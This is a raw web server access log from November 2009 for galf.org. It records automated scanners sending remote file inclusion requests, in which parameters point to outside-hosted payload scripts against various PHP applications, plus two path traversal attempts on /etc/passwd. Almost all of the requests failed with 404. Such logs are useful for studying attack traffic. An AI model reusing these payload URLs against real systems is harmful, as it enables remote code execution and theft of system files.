122.155.5.84 - - [09/Nov/2009:00:20:57 -0800] "GET /logs/access_090504.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:21:12 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:21:13 -0800] "GET /logs/access_090504.log///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:21:14 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
96.31.90.40 - - [09/Nov/2009:00:24:41 -0800] "GET /?file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
96.31.90.40 - - [09/Nov/2009:00:24:48 -0800] "GET /?file=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
200.29.90.110 - - [09/Nov/2009:00:25:43 -0800] "GET /include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [09/Nov/2009:00:25:43 -0800] "GET /logs/access_091012.log/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [09/Nov/2009:00:25:43 -0800] "GET /logs/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [09/Nov/2009:00:26:07 -0800] "GET /logs///administrator/components/com_virtuemart/saveserver.php?mosConfig_absolute_path=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/small/2008_08_09/test.txt? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
78.110.50.121 - - [09/Nov/2009:00:26:07 -0800] "GET //administrator/components/com_virtuemart/saveserver.php?mosConfig_absolute_path=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/small/2008_08_09/test.txt? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:26:22 -0800] "GET /logs/access_091012.log//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:26:47 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:26:52 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.39.130.176 - - [09/Nov/2009:00:26:52 -0800] "GET /logs/access.log///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.39.130.176 - - [09/Nov/2009:00:26:52 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.39.130.176 - - [09/Nov/2009:00:27:12 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.39.130.176 - - [09/Nov/2009:00:27:12 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.39.130.176 - - [09/Nov/2009:00:27:12 -0800] "GET /logs/access.log///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.54.130 - - [09/Nov/2009:00:27:14 -0800] "GET /logs/access_090928.log//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [09/Nov/2009:00:27:57 -0800] "GET /include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:04 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:04 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:04 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:06 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:06 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:29:07 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:25 -0800] "GET /logs/access_090316.log//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:25 -0800] "GET /logs/access_090316.log//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:26 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:26 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:58 -0800] "GET /logs/access_090803.log//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.108.128.150 - - [09/Nov/2009:00:29:58 -0800] "GET /logs/access_090803.log//modules/vwar/convert/mvcw_conver.php?step=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:00:31:31 -0800] "GET /logs/access_090525.log//pollphp/db//booth.php?include_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:00:31:31 -0800] "GET /pollphp/db//booth.php?include_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:00:31:31 -0800] "GET /logs//pollphp/db//booth.php?include_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:34:33 -0800] "GET /logs/access_091012.log///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:34:51 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [09/Nov/2009:00:34:53 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
67.214.143.99 - - [09/Nov/2009:00:34:53 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "galf.org"
204.14.90.22 - - [09/Nov/2009:00:34:54 -0800] "GET /nucleus/xmlrpc/server.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:34:58 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:34:58 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:35:25 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:00:35:27 -0800] "GET /logs//index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:00:35:27 -0800] "GET /index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:00:35:27 -0800] "GET /logs/access_090406.log//index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:35:35 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:14 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:14 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:14 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:54 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:54 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.104.70.13 - - [09/Nov/2009:00:37:54 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:27 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:27 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:27 -0800] "GET /logs/access_090330.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:34 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:34 -0800] "GET /logs/access_090330.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:34 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [09/Nov/2009:00:38:50 -0800] "GET /home.php?pagina=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [09/Nov/2009:00:38:50 -0800] "GET /logs/home.php?pagina=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [09/Nov/2009:00:38:50 -0800] "GET /logs/access_090316.log/home.php?pagina=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [09/Nov/2009:00:38:50 -0800] "GET /logs/access_090427.log/home.php?pagina=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:51 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:51 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:38:51 -0800] "GET /logs/access_090330.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:39:25 -0800] "GET /logs/access_090511.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:39:27 -0800] "GET /logs/access_090511.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:39:32 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:39:32 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.130.176 - - [09/Nov/2009:00:39:33 -0800] "GET /logs/access_091012.log///skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:39:45 -0800] "GET /logs/access_090511.log%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:05 -0800] "GET /logs/access_091012.log%20%20//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:05 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:05 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:25 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:25 -0800] "GET /logs/access_090518.log%20%20//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:25 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:44 -0800] "GET /logs/access_090504.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:44 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:40:44 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:05 -0800] "GET /logs/access_090525.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:05 -0800] "GET /logs/access_090622.log%20%20//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:22 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:22 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:22 -0800] "GET /logs/access_090330.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:29 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:29 -0800] "GET /logs/access_090330.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:29 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:32 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:32 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:41:32 -0800] "GET /logs/access_090330.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:42 -0800] "GET /logs/access_091012.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:42 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:42 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:58 -0800] "GET /logs/access_090504.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:58 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:41:58 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:42:15 -0800] "GET /logs/access_090511.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:42:24 -0800] "GET /logs/access_090511.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:42:25 -0800] "GET /logs/access_090511.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [09/Nov/2009:00:42:30 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hit168.net//images/upload/ComPic/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
116.127.121.116 - - [09/Nov/2009:00:42:30 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hit168.net//images/upload/ComPic/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
116.127.121.116 - - [09/Nov/2009:00:42:32 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hit168.net//images/upload/ComPic/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "galf.org"
116.127.121.116 - - [09/Nov/2009:00:42:32 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hit168.net//images/upload/ComPic/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
189.90.16.57 - - [09/Nov/2009:00:42:55 -0800] "GET /logs/access_090525.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:43:03 -0800] "GET /logs/access_090518.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:43:03 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:43:03 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:45:29 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:45:29 -0800] "GET /logs/access_091012.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:45:29 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:47:11 -0800] "GET /logs/access_090622.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:47:45 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:00 -0800] "GET /logs/access_090817.log/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:00 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:00 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:09 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:12 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:13 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:27 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:30 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:30 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:34 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
